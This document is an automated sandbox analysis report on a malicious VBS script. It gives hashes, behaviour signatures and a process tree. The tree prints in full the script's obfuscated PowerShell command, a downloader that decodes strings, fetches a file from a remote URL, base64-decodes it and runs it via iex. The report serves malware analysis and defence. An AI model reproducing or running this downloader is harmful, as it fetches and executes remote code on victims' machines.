Analysis
max time kernel: 150s
max time network: 150s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 12/06/2024, 15:10
Static task: static1
Behavioral task: behavioral1
  Sample: 1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs
  Resource: win10v2004-20240508-en
General
Target: 1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs
Size: 132KB
MD5: 77818ebbfbaed2bcdf22c0132e7ab103
SHA1: 1c863ef727d3d363de06909c1eab3d3206a45f91
SHA256: 1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859
SHA512: 15fa46e9ac136559638731e2257a847fc4aca1e86d2db29465357e6ec54f820a5b9da7dc2749d1a8fc283435ae51b9cdc655fc9ae3e8a83a03422972b1e59b3f
SSDEEP: 3072:fwuzkYMPZJqaVBsPHFBktYkCeJ+URvMP/Rj5mk36VYK4qhU4IsMMBlKcUWLZ:f7kYMPZoaVBsPHFBqYkR+URkP/Rj5mjN
Malware Config
Signatures
- Blocklisted process makes network request (62 IoCs)
  flow   pid   Process
  6..67  2672  powershell.exe   (62 rows, one per flow 6 through 67; every row is pid 2672, powershell.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Runs ping.exe (1 TTPs, 2 IoCs)
  pid   Process
  1716  ping.exe
  3036  ping.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2672  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2672  powershell.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  description                       pid   Process         procid_target
  PID 2032 wrote to memory of 1716  2032  WScript.exe     28
  PID 2032 wrote to memory of 1716  2032  WScript.exe     28
  PID 2032 wrote to memory of 1716  2032  WScript.exe     28
  PID 2032 wrote to memory of 3036  2032  WScript.exe     30
  PID 2032 wrote to memory of 3036  2032  WScript.exe     30
  PID 2032 wrote to memory of 3036  2032  WScript.exe     30
  PID 2032 wrote to memory of 2288  2032  WScript.exe     32
  PID 2032 wrote to memory of 2288  2032  WScript.exe     32
  PID 2032 wrote to memory of 2288  2032  WScript.exe     32
  PID 2032 wrote to memory of 2672  2032  WScript.exe     34
  PID 2032 wrote to memory of 2672  2032  WScript.exe     34
  PID 2032 wrote to memory of 2672  2032  WScript.exe     34
  PID 2672 wrote to memory of 2844  2672  powershell.exe  36
  PID 2672 wrote to memory of 2844  2672  powershell.exe  36
  PID 2672 wrote to memory of 2844  2672  powershell.exe  36
Processes
C:\Windows\System32\WScript.exe  (PID 2032)
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs"
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\ping.exe  (PID 1716)
    command line: ping google.com -n 1
    - Runs ping.exe
  C:\Windows\System32\ping.exe  (PID 3036)
    command line: ping %.%.%.%
    - Runs ping.exe
  C:\Windows\system32\cmd.exe  (PID 2288)
    command line: C:\Windows\system32\cmd.exe /c dir
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$badehuset = 1;Function Tontiner($Pujas206){$Thoroughness=$Pujas206.Length-$badehuset;$Projektidxd114='Substring';For( $Mindetavlen252=5;$Mindetavlen252 -lt $Thoroughness;$Mindetavlen252+=6){$Slingers+=$Pujas206.$Projektidxd114.Invoke( $Mindetavlen252, $badehuset);}$Slingers;}function footbridges($Skattekorts){ . ($Revises) ($Skattekorts);}$Quinonic=Tontiner 'tagetM,stopoTambozNo.coi.endslHotsplDi.agaSp,nn/Repro5Carlo.Solol0 Flns Holdu(N nmeWDatofi ilymnsh.mmdRigsmoCunylwSlipks.emon RepiNAngelT U bo Berne1Sknke0Henb,.Raket0Court;Danne InsisWOktaliBivaanUnd.r6 Qual4Mortu;Gra m SikkxEroti6.rflj4Pol.e;Overc .upprBroadvSrhft:Bager1Nonsu2Retro1 Cont. G,lf0Films) Fera Non.eGLeptoe Hovec F nekUltraoSt,di/endo 2Ti.sm0 Loya1delre0Sulph0 ,usi1D.spo0rutt.1P sid PhotoFLaspriSmlderBromyeFamilfziggioSayabxSudat/Irela1Mesna2 Deon1Patr...koda0Audin ';$Personregisterets=Tontiner 'PomegUpluvisI,tereHo rorHyper-sjleaA Teo,gundese SandnH.rtytBlo,p ';$Fishwood=Tontiner 'Mi.eyhPantetIngvatAarenpPusslsDe.ar:Pen.i/H.lic/,remkwTriksw GarrwVrtsh. E,feaPropatOdocoo GuldramplidSchiseFalc gLomba.T,melcPalsyo EmblmFring.TronsbWithirdolph/Sa,meU Din,pAbefehUn.ero SkilaRegarrHelnodP,radiSprotnBssesgSejlk. Cow,h t.eshLifelpColum ';$counterintelligence=Tontiner 'Sam,e>Exo,r ';$Revises=Tontiner ',indeiTagdkeOutblxkvajp ';$Maldiverne='Pedeller';$supertranscendentness = Tontiner 'Inspie.epyscCackehOpsigoHecto Fimbr%Japhea ClaupSov,hp torhdcomplaPrim.tAttraa Pass% rees\vernoD,enfdiSminto Mul.m.capueMrknidReconeSkiftsFavou. 
atalMTranqeO.kalt Bagt Snows&resti& Velk BuddieDixiecHuyghh TovroTegns edit elv ';footbridges (Tontiner ' stm$B rdegMuckilFj rto Salvb embrafemdolAfmel:GrundARundscAfrivhBenztiFarten C,areLet,rs.nganeH.rti=Submo(RetskcSk,rlmAvlstdporte S.mit/Udlsec Neds F lia$Sil csNih,luTurbopAmpuleBrepirRadiot otalrBefataM,bilnGeo gsAc,accSubsteDis,anExterdRef reFlappn Atl.tJustinAdteve Tkk,s Frigs.dels)Peni, ');footbridges (Tontiner 'kines$pe.ocg.dvarlM skio,icrob UltraDoughlSulph:ForurLNvnspa teruEmielgTudsehThr.nipul cnMavengeffeksLumb.=Woozl$RekorFPigmeiSh,iksLion.hInverwChrisoBiennoSeq.adSubal.Skil sRressp Indkl Bla iFrkentPo os(Hepca$UdvikcPaedeoStoppuOliernfo,nttPr,queWa.slr Urugiudst n M,cht ,ilbeDosmelDe.idlFortliHalslg Un.oeKons.nsnigvcZarereBarra)Moles ');$Fishwood=$Laughings[0];$Scrotocele= (Tontiner 'Discr$ferskgPreorlUncisokathab AeroaSalutl,elta:OpvarD ,omiiDr,kmg ,npatBlgeteAnticrU dervFo earBr.shkSnitteTrstetTwa ksImpot= To hNPiiabeN.stiw Iva.-Skot,Opoly,bHorrijTebreeSkuffcpli,stSkarp OctahSsho.ey sekss M,rrtSter.ePyro.mBrnds. elonNUdra,eDi.kntFatti. UndeWNud,leCrowsb ShadC TelelLasari Bry.eSplennRevist');$Scrotocele+=$Achinese[1];footbridges ($Scrotocele);footbridges (Tontiner 'Potcr$Du.frD ulvei pidng jordtVind,e rratrDematvFloutr Svankuncohe UnsttEft.rs .ibb.AndroHStrene FebraSvagsdClosee.ierorGlobasAncyl[,rgen$UnworPIn,pieSpa,crsa.chsUn eroUdha,nS,ondrPerr.eFortag CycliAmendsNissetGeneseStolerStilkeAppritUnforsMower] Para=Swish$RelenQEf.eruKlodsiAgarwnParanoFedt nUnderi th.ecRebu, ');$Biloculina=Tontiner ',etta$FaresDPsychiTil agBurg.tPleureSieror,roduvMicror DirikHavareFlkkst ,ecosNonle. 
RustDAr,afoIndexwSkrebnF rtflBluebo MissaRdkrid PhotF.iramiUncralPortheKe me(clegg$EnergFColliiAkties Prophsto hwSkraaoSt kno.ermidBenme,Lexic$ J.veAS.rmulOvisiiKyo,dyPolonaNu,anhrumne)Fortr ';$Aliyah=$Achinese[0];footbridges (Tontiner 'B.rtv$RechugSmreolU kreoByggebD.leva EqualSamme:OpsluSB,shatJerimeRegendLyksah Sp,oo MalerScorbsWarileSkiftsGodtg=Valgb(Mo,saTMhedeeDownpsCathatStint- poliPStortaPeript UndehUdva, Subra$EgetrABeciflCampiiInaccy SystaSva,eh S,pr)Ne to ');while (!$Stedhorses) {footbridges (Tontiner ' .ile$Opposga omalEnvisoOpl ibBylanaTe eglbogst:frid.T,errueVaabesB,kletAs ondMi era onotPep,oaForefsreceptUnove=Tilve$fribrt E,ucr M touSkorteAlmue ') ;footbridges $Biloculina;footbridges (Tontiner ' Art S galetUnthiaVi,gurlobsttNonde-So,tySIdiomlIntere BarbeDokkepNonda sympt4 Udbl ');footbridges (Tontiner ' Rele$ llomgDena l nkoo .pstbSkovma InvalLser,:QuotiSTescht FaneeJuleedImpl,hSatsboParafrAc essSwa.geTve psCori = Dor,(ArgenT Gglee Bo.bsDechitAdenf- l mmPNaturaUtinatDecemh Foru Prere$GymnaAB medlSayabiMaveryOver,aFannehButik)methy ') ;footbridges (Tontiner ' Osti$fecu gPeraglHvaeloIndolb millaNontalVanva:,uperPTreelrL,rici For,oTanderAs.etiDubbet,orhaespaadtValgbsUvilkh.njouaTo.tovnas.iest,kvrPar veRistesArina=Biote$ ProrgGu,sblBil coBedr.b Hunda horilAuxes:MullsAGodkefMumhotHumusvAffaltSk ort Solhe ReinlBellis Tal.eFuld,rTempenPrenieTu nd+print+Sorte% Pitc$GoldfL erreaSlynguTenemgT asshPr tfiStamfnPres.g,xtras,orde.HalvbcP gmsoUnox,uCentenTotidtDagli ') ;$Fishwood=$Laughings[$Prioritetshaveres];}$Fantasteriers79=344305;$stjernetydere=28583;footbridges (Tontiner 'Fej p$Nondog MdealCoaguoTosprbAntr aLangvlFockl:Lo.dsPHurlsr,ammeo Uds tTo reeInexprNeutrvKodeliEq.iltFortry kons hazza=Afh.t TrophGReinceStorktPelar-SkimmCSph.ro .oksnIrv,nt .raneDavennBajett Faam Messi$ oma,A Ubbel,hirti ProvyPostmaA.ernhRa.pe ');footbridges (Tontiner ' G.ns$Al,ohgSupral C,enoAvi.sbTropeaunlizlStvfr:StonaUJammenKardic SlesoTittinS xtifYel,eiMarg.nUnbrae F agd Pestl 
BlesyRu.ri Luxa.=Out.i Dow.[Tr dvSNednoy Prias.egirtCranieMisremAfd l.inte.CElemeoRed,en N vev DigeeSoie.rFilostAr.it]Repub:Boje.:AlnatFPrmierN tiooPageamHecatBDecoraScribsOmnifeBerid6sophi4GartnSPergatBarderEmbariApomenUno,igOpist(Odiou$TilflPKrakerTiosuosubsitPhotoeSka.trFolktv,orsfihariat Rou,yVerde)Menne ');footbridges (Tontiner 'Syrne$GaskrgFags lUnquao .ageb Bal,aLykkelfarts: R.apFDehuma Te,mr,ochoeBemintMul,irNomaduTr cteVedhnnNatted plamekleptsFrake1Pleje6S tte1Sving Ou.gr=Besid Atom[KronrSN,deryJ.nglsCathotSstvleHjortm ,opl.UnconTBeskyeForlnxquadrtPha.t. Her EPibalnFej,lcPhoebo orddLovlyi,ambunMars g O.ts].kraa:De.ug: Ol.nACentrSAbonnCpiebaI FordIUforg.Ser.oGRafleeGespetSu asSA,falt .jerrHoverimumpenSpoong ilei(therm$TrochUSuckunRokkecLaroioEmnean,olsjfKneppiGrnthnYomereBlunkdFornol SkruyDefin)Vanre ');footbridges (Tontiner 'modal$Knowhgta.etlDeem,oTerutbUnestaFyrbdlKant :desanOOrdinvN,tteeru isr arsfPlantoTabagrDysfamthoroyBesrgnUnresdRig.ie,atterSpgel1Aften6Cavea3 Gens=Trret$ LysrFenddaaRadbrr,lcedeZaport SverrSemimuNature Til nKortld Raine DepasStift1Molap6Vindi1Rhizo.Ildsls ArcauSprgebBill.sPilf tSa mer PrakiCaymanAppregbasep( Emod$BondeFS.iffaGrisonSkuldtUnex.a Paa sBerlitSkib.e.olkerbnderi Pla.eBlephrRegros tork7Hygum9E.spe,Opspr$preobsUdsg.tLoyrejSidsteBeto.r AutonLigese de.otOvertyAdresdResp,eGr,ahr Antie.eods)craju ');footbridges $Overformynder163;"2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2672
    C:\Windows\system32\cmd.exe  (PID 2844)
      command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Diomedes.Met && echo t"